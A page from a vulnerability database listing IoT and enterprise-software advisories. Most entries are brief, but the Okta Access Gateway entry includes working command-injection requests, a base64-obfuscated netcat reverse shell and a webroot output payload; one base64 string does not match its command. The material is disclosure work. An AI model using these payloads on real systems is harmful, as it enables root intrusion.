VARIoT IoT vulnerabilities database

VAR-202104-0035 CVE-2020-11247 Out-of-bounds read vulnerability in multiple Qualcomm products CVSS V2: 9.4
CVSS V3: 9.1
Severity: CRITICAL
Out-of-bounds memory read while unpacking data, due to a missing offset length check, in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables. Multiple Qualcomm products contain an out-of-bounds read vulnerability. Impact: information disclosure and denial of service (DoS).

VAR-202104-0038 CVE-2020-11255 Missing release of memory after effective lifetime in multiple Qualcomm products CVSS V2: 7.8
CVSS V3: 7.5
Severity: HIGH
Denial of service while processing RTCP packets containing multiple SDES reports, because only the memory for the last SDES packet is freed and the rest of the memory is leaked, in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Wearables. Multiple Qualcomm products contain a missing-release-of-memory vulnerability. Impact: denial of service (DoS).

VAR-202104-1112 CVE-2021-30055 SQL injection vulnerability in Knowage Suite CVSS V2: 6.5
CVSS V3: 8.8
Severity: HIGH
A SQL injection vulnerability in Knowage Suite version 7.1 exists in the documentexecution/url analytics driver component via the 'par_year' parameter when running a report.

VAR-202104-1115 CVE-2021-30058 Cross-site scripting vulnerability in Knowage Suite CVSS V2: 4.3
CVSS V3: 6.1
Severity: MEDIUM
Knowage Suite before 7.4 is vulnerable to cross-site scripting (XSS). An attacker can inject arbitrary external script in '/knowagecockpitengine/api/1.0/pages/execute' via the 'SBI_HOST' parameter.

VAR-202104-1114 CVE-2021-30057 Injection vulnerability in Knowage Suite CVSS V2: 3.5
CVSS V3: 4.8
Severity: MEDIUM
A stored HTML injection vulnerability exists in Knowage Suite version 7.1. An attacker can inject arbitrary HTML in "/restful-services/2.0/analyticalDrivers" via the 'LABEL' and 'NAME' parameters. Knowage Suite is vulnerable to injection. Impact: information disclosure and information tampering.

VAR-202104-1113 CVE-2021-30056 Reflected cross-site scripting vulnerability in Knowage Suite CVSS V2: 3.5
CVSS V3: 5.4
Severity: MEDIUM
Knowage Suite before 7.4 is vulnerable to reflected cross-site scripting (XSS). An attacker can inject arbitrary web script in /restful-services/publish via the 'EXEC_FROM' parameter, which can lead to data leakage.

VAR-202104-1987 No CVE SQL injection vulnerability in DCS Synthesis myRetailerPlus CVSS V2: 7.8
CVSS V3: -
Severity: HIGH
myRetailerPlus is a web application. DCS Synthesis myRetailerPlus has a SQL injection vulnerability, which attackers can exploit to obtain sensitive database information.

VAR-202104-2051 No CVE Unauthorized access vulnerability in Panasonic cameras CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
The WV-SW396 is a camera made by Matsushita Electric (China) Co., Ltd. (Panasonic). Panasonic cameras have an unauthorized access vulnerability, which attackers can exploit to obtain sensitive information.

VAR-202104-2053 No CVE Weak password vulnerability in SANYO cameras CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
Sanyo (SANYO) is a large Japanese enterprise group with a 60-year history, headquartered in Osaka, Japan; its products include displays, mobile phones, digital cameras, machinery, biopharmaceuticals and many other fields. The SANYO camera has a weak password vulnerability, which attackers can exploit to obtain sensitive information.

VAR-202104-2054 No CVE Weak password vulnerability in tantos series cameras CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
Shenzhen Zhianshi Technology Co., Ltd. develops video surveillance technology and provides users with video surveillance solutions. The tantos series cameras have a weak password vulnerability, which attackers can exploit to obtain sensitive information.

VAR-202104-1998 No CVE Command injection vulnerability in DrayTek Vigor 2960/3900/300B VPN Firewall CVSS V2: 10.0
CVSS V3: -
Severity: HIGH
DrayTek Vigor series routers are dual-WAN security firewall routers designed for medium-sized enterprises. The DrayTek Vigor 2960/3900/300B VPN Firewall has a command injection vulnerability. Attackers can use it to execute arbitrary commands and gain privileges on the router.

VAR-202104-2000 No CVE Arbitrary file read vulnerability in Samsung router WLAN AP CVSS V2: 2.1
CVSS V3: -
Severity: LOW
Samsung (China) Investment Co., Ltd. is the headquarters of Samsung Group in China. As of the end of 2008, 20 of Samsung's more than 30 companies had invested in China, including Samsung Electronics, Samsung SDI, Samsung SDS, and Samsung Electro-Mechanics. The Samsung router WLAN AP has an arbitrary file read vulnerability. Attackers can use it to read sensitive files on the router and obtain sensitive information.

VAR-202104-2003 No CVE Command execution vulnerability in Samsung router WLAN AP CVSS V2: 7.1
CVSS V3: -
Severity: HIGH
Samsung (China) Investment Co., Ltd. is the headquarters of Samsung Group in China. As of the end of 2008, 20 of Samsung's more than 30 companies had invested in China, including Samsung Electronics, Samsung SDI, Samsung SDS, and Samsung Electro-Mechanics. The Samsung router WLAN AP has a command execution vulnerability. Attackers can use it to execute commands.

VAR-202104-2002 No CVE Weak password vulnerability in Tenda router CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
Shenzhen Jixiang Tengda Technology Co., Ltd. (hereinafter "Tenda"), founded in 1999, is a professional supplier of network communication equipment and solutions. The Tenda router has a weak password vulnerability. Attackers can use the default weak password to log in to the system's management backend and obtain sensitive information.

VAR-202104-1074 CVE-2021-30127 Improper authentication vulnerability in TerraMaster F2-210 devices CVSS V2: 7.5
CVSS V3: 7.3
Severity: HIGH
TerraMaster F2-210 devices through 2021-04-03 use UPnP to make the admin web server accessible over the Internet on TCP port 8181, which is arguably inconsistent with the "It is only available on the local network" documentation. NOTE: manually editing /etc/upnp.json provides a partial but undocumented workaround. TerraMaster F2-210 devices contain an improper authentication vulnerability. Impact: information disclosure, information tampering, and denial of service (DoS).

VAR-202104-2005 No CVE Weak password vulnerabilities in many Hikvision IP cameras CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
Hikvision is a video-centric intelligent IoT solution and big data service provider. Many Hikvision IP cameras have weak password vulnerabilities. Attackers can use them to log in to the system backend and gain administrator privileges.

VAR-202104-1116 CVE-2021-30072 Out-of-bounds write vulnerability in D-Link DIR-878 devices CVSS V2: 7.5
CVSS V3: 9.8
Severity: CRITICAL
An issue was discovered in prog.cgi on D-Link DIR-878 1.30B08 devices. Because strcat is misused, there is a stack-based buffer overflow that does not require authentication. D-Link DIR-878 devices contain an out-of-bounds write vulnerability. Impact: information disclosure, information tampering, and denial of service (DoS). The D-Link DIR-878 is a wireless router produced by D-Link in Taiwan; prog.cgi in D-Link DIR-878 1.30B08 has a stack buffer overflow vulnerability.

VAR-202104-0016 CVE-2020-11922 WiZ Connected WiZ Colors A60 information disclosure vulnerability CVSS V2: 3.3
CVSS V3: 4.3
Severity: MEDIUM
An issue was discovered in WiZ Colors A60 1.14.0. The device sends unnecessary information to the cloud controller server. Although this information is sent encrypted and has low risk in isolation, it decreases the privacy of the end user. The information sent includes the local IP address being used and the SSID of the Wi-Fi network the device is connected to. (Various resources such as wigle.net can be used for mapping SSIDs to physical locations.) No further vulnerability details are currently provided. The lightbulb by default transmits privacy-sensitive information to the cloud system.
[Reference] N/A
[Has vendor confirmed or acknowledged the vulnerability?] true
[Discoverer] Willem Westerhof, Wouter Wessels, Jim Blankendaal, Jasper Nota from Qbit, commissioned by the Consumentenbond.

VAR-202104-0151 CVE-2020-27600 OS command injection vulnerability in D-Link DIR-846 router CVSS V2: 10.0
CVSS V3: 9.8
Severity: CRITICAL
HNAP1/control/SetMasterWLanSettings.php in D-Link Router DIR-846 A1_100.26 allows remote attackers to execute arbitrary commands via shell metacharacters in the ssid0 or ssid1 parameter. The D-Link Router DIR-846 has an OS command injection vulnerability. Impact: information disclosure, information tampering, and denial of service (DoS). The D-Link DIR-846 is a 6-antenna 1200M full-gigabit dual-band MU-MIMO wireless router. D-Link DIR-846 A1_100.26 has an OS command injection vulnerability.

VAR-202104-1194 CVE-2021-28113 OS command injection vulnerability in Okta Access Gateway CVSS V2: 8.7
CVSS V3: 6.7
Severity: MEDIUM
A command injection vulnerability in the cookieDomain and relayDomain parameters of Okta Access Gateway before 2020.9.3 allows attackers (with admin access to the Okta Access Gateway UI) to execute OS commands as a privileged system account. Since the injection occurs when a script is executed with sudo, the commands are run with root privileges.

BUG #1 - relay
Command injection as root in Applications via the 'relaydomain' field when passing parameters to generateCert.sh. This is blind injection, so without monitoring logs or local execution instrumentation, the output will not simply be returned in the response. Also, the 'nc' binary included in the system image has the -e flag available, which makes exploitation easier via a connect-back shell.

[Request]
POST /api/v1/app/idp/[valid-IDP] HTTP/1.1
Host: gw-admin.domain.tld
Content-Type: application/json;charset=utf-8
X-CSRF-TOKEN: [placeholder]
Content-Length: 134
Cookie: CSRF-TOKEN=[placeholder]; JSESSIONID=[placeholder]; SessionCookie=[placeholder]

{"settings": {"label":"test", "type":"CERTHEADER2015_APP", "relaydomain":"..$(whoami)", <-- HERE "groups":[], "handlers":{}} ,"policies":[{}]}

[Response /w local instrumentation for monitoring]
pid=23033 executed [/bin/bash /opt/oag/bin/generateCert.sh -w -d .root ]

[Quick testing]
"relaydomain":"..$(reboot)" and the system should reboot.

[Exploitation for reverse shell]
Note: for some bizarre reason, this payload worked for a period of time during testing, but was not generally reproducible afterwards.
1) generate base64 for the connect back command to be executed
$ echo -n "nc 10.0.0.111 5000 -e /bin/bash" | base64
bmMgMTAuMTAuMTAuMTc5IDU1NTUgLWUgL2Jpbi9iYXNo
2) start a listener
$ nc -l -p 5000
...
3) make the request with the payload (.. is required due to how it parses domains)
..$(echo${IFS}'bmMgMTAuMC4wLjExMSA1MDAwIC1lIC9iaW4vYmFzaA=='>test;$(base64${IFS}-d${IFS}test))
4) get a root shell from the server
* connection from 10.0.0.77 *
python -c 'import pty; pty.spawn("/bin/bash")'
[0] root@oag.okta.com;/root#
Note: the hostname of the local OAG test system happens to be oag.okta.com and has nothing to do with any Okta company servers.

BUG #2 - cookie
Command injection as root in Identity Providers via the 'cookieDomain' field when passing parameters to generateCert.sh.

[Request]
POST /api/v1/setting/idp/local HTTP/1.1
Host: gw-admin.domain.tld
Content-Type: application/json;charset=utf-8
X-CSRF-TOKEN: [placeholder]
Content-Length: 222
Cookie: CSRF-TOKEN=[placeholder]; JSESSIONID=[placeholder]; SessionCookie=[placeholder]

{"subCategory": "IDP_SAML_LOCAL", "json":{ "name":"Local OAG IDP", "host":"https://google.com", "cookieDomain":"$(uname${IFS}-n)", <-- HERE "nameIDFormat":"urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified", "metadata":{}}, "$edit":true}

[Response /w local instrumentation for monitoring]
pid=22822 executed [/bin/bash /opt/oag/bin/generateCert.sh -w -d Linux oag 3.10.0-957.27.2.el7.x86_64 #1 SMP Mon Jul 29 17:46:05 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux uid=0(root) gid=0(root) groups=0(root) ]

[Quick testing]
"cookieDomain":"$(reboot)" and the system should reboot.

[Exploitation for executing commands with output in the webroot]
Same note as the previous one; for some reason, this payload worked for a period of time during testing, but then stopped fully working (the bug was still there, just less exploitable).
1) generate base64 for "ls -al /root" to be written to a location accessible via web request
$ echo -n "script -q -c ls\$IFS-al\$IFS/root /opt/oag/simpleSAMLphp/www/test.php" | base64 -w0
c2NyaXB0IC1xIC1jIGxzJElGUy1hbCRJRlMvcm9vdCAvb3B0L29hZy9zaW1wbGVTQU1McGhwL3d3dy90ZXN0LnBocA==
2) make the request with the payload
$(echo${IFS}'c2NyaXB0IC1xIC1jIGxzJElGUy1hbCRJRlMvcm9vdCAvb3B0L29hZy9zaW1wbGVTQU1McGhwL3d3dy90ZXN0LnBocA=='>test;$(base64${IFS}-d${IFS}test))
3) check https://gw-admin.domain.tld/auth/test.php for the output of the command

=== Fix ===
The cookie bug was a "known issue" and fixed in v2020.9.3, and the relay bug was also fixed and no longer works on the latest v2021.2.1.
https://www.okta.com/security-advisories/cve-2021-28113/